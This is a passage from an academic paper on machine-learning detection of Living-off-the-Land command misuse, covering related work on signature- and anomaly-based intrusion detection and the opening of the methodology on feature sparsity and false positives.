tem fails.
Because a large-scale LotL dataset is hard to ob-
tain, we had to build our own corpus in order to train
and test the models. We describe the process we used
and we include the open-source repositories that we
collected malicious examples from. Everything de-
scribed in this paper is currently freely available as
an open-source repository (link provided in Section
6) and a PIP package with pre-trained models (lolc).
However, we are unable to share the corpus because
the benign examples could contain sensitive informa-
tion. Instead, we offer insights into our data and tag
distribution (Section 5).
2 RELATED WORK
Whether or not we are concerned about LotL detec-
tion, intrusion detection systems fall in two main cate-
gories: (a) Signature-Based (SB) and Anomaly-Based
(AB).
Signature-Based detection relies on identifying
patterns of commands that were previously observed
to have been misused in other attacks Modi et al.
(2013). With a high number of rules comes a high
accuracy. However, it generalizes poorly on new at-
tack methods and, to our knowledge, the most effi-
cient way to automatically catch and generate rules
for new attacks methods is through the use of honey
pots Kreibich and Crowcroft (2004). The later men-
tioned come with their own ups and downs, which
will not be discussed here, except for the fact that,
in time, attackers learn how to detect and avoid honey
pots themselves.
Anomaly-Based detection relies on modeling,
usually through statistics, what can be regarded as
normal operations and on alerting whenever a sys-
tem or application falls outside the normal behaviour
Boros et al. (2021); Butun et al. (2013); Lee et al.
(1999); Silveira and Diot (2010)
1
. They can either
rely on directly modeling a monitored system or on
computing the model based on a preexisting data-
setDurst et al. (1999), though the later would nor-
mally fall into the supervised learning class, rather
than the unsupervised (anomaly-based) class. While
all AB systems are better at adapting and detecting
new attack methods, purely unsupervised methods
usually yield a higher number of false positives than
their supervised counterparts. On the other hand, su-
pervised methods are better at avoiding false alerts,
1
Some of the cited work, refers to network based
anomaly detection. The basic ideas and principles still ap-
ply for LotLs detection, but the volume of data is much
lower.
but they are only as good as the labeled data they are
trained on, thus requiring periodic updates and higher
maintenance.
Notice: This research only focuses on misuse
of LotL binaries and tools. It might seem obvious
for most security experts, but we are going to say
it anyway: Relying on just one type of detection,
including LotLs detection, is not effective from the
security standpoint. Only by combining signature
based, anomaly based, network profiling, obfusca-
tion detection, system auditing and all the other well-
established methods, a Defense in Depth approach,
can one obtain a decent level of security and safety.
3 PROPOSED METHODOLOGY
Our methodology can be classified as a special case of
signature based intrusion detection that employs ma-
chine learning for modeling. There are two main ML
related issues we need to take into consideration:
(a) Data Sparsity: A naive approach would be to
rely on n-gram related features that can be easily ex-
tracted from the command-lines in the dataset. This is
probably one of the most common approaches when
it comes to using ML on text data. However, this re-
sults in a rich feature set, which in turn generates data
sparsity and enables the model to quickly over-fit the
dataset and generalize poorly on previously unseen
examples.
(b) False Positives: Given the skewed nature of
real-life data
2
, there is always a “power-struggle” be-
tween precision (how many of the examples that are
marked as malicious are actually labeled correctly)
and recall (how many of the malicious examples from
the overall mass are actually identified). This is best
captured by specific metrics for skewed datasets, such
as the F-Score.
In order to mitigate data sparsity we used a fea-
ture extraction scheme that is mostly manually de-
signed and incorporates lots of human-expert knowl-
edge. This keeps the feature-set to a decent size and
focuses mostly on features that weigh heavily on the
decision of the classifier (as opposed to automatically
extracted features, such as n-grams, that would proba-
bly introduce a lot of useless information). To address
false positives, we manually compile our dataset and
we use a huge ratio between benign and malign exam-
ples. Also, we repeatedly tweaked our feature extrac-
tion scheme and retrained our classifier, until we ob-
tained a high f-score, with the following mentioned:
2
In a standard and relatively secure environment, most
of the collected data will probably be benign, and not mali-
cious
IoTBDS 2022 - 7th International Conference on Internet of Things, Big Data and Security
134